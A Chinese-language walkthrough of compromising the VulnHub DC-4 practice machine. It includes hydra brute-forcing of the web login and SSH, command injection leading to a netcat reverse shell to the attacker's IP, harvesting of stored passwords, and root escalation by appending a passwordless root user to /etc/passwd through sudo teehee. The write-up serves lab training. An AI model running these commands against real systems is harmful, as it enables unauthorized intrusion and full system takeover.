vulnhub DC-4 靶机 渗透测试

首先进行端口发现，开放80和22两个端口

 打开网站是一个登陆框，有一串英文Admin Information Systems Login。

使用hydra对密码进行破解，（burp真的是太慢了）。

设置用户名为admin，因为虽然我们不确定他的用户名百分百是admin，但是在网页内容上显示的是Admin Information Systems Login，借此我们可以假定用户名是admin。

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.63.9 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"

破解出密码为happy

 登陆进去以后，发现一个List file功能，可以列出文件列表，通过抓包发现他发送的是一个system命令

 我们使用burp抓包，然后发送到重放器

 尝试执行whoami

可以正常回显，尝试反弹个shell试试？

攻击机执行nc -nvlp 4444，监听4444端口

尝试了许多反弹shell方法，发现攻击机可以执行nc。

靶机执行nc -e /bin/sh 192.168.63.130 4444，反弹到攻击机端口

找了半天发现了一个文件，位置是在：/home/jim/backups/old-passwords.bak

 输入命令 cat old-passwords.bak，然后复制内容到文本里。

 我们当时在扫描端口的时候还有一个22端口，我们尝试利用这些密码破解ssh

hydra -l jim -P'/home/kali/桌面/JimPassword.txt' 192.168.63.9 ssh

大概两分钟，密码破解出来了：jibril04

使用ssh链接到终端，密码为刚才爆破出来的

ssh [email protected]

 尝试sudo -l查看可以使用的命令，发现没权执行sudo，然后又找了半天，在/var/mail找到了一个叫jim的文件，打开是一封信，里面有个密码^xHhA&hvim0y，发信人是Charles

 我们切换到Charles的账号，sudo -l查看他可以执行的命令

#切换到charles
su charles
#查看用户权限
sudo -l

 发现一个不用root密码就可以执行root权限的应用/usr/bin/teehee，这是个小众的linux编辑器。

 网上找了篇关于teehee提权的文章：teehee提权 - 隐念笎 - 博客园 (cnblogs.com)

 原理是使用teehee向/etc/passwd插入一个没有密码的root权限用户

执行命令：

#写入一个没有密码的root权限的用户叫xiaosong，使用teehee插入到/etc/passwd里
echo "xiaosong::0:0:::/bin/bash" | sudo /usr/bin/teehee -a /etc/passwd
#切换用户到xiaosong
su xiaosong

提权成功，然后去/root里获取flag

#切换到/root目录
cd /root
#输出flag.txt文件
cat flag.txt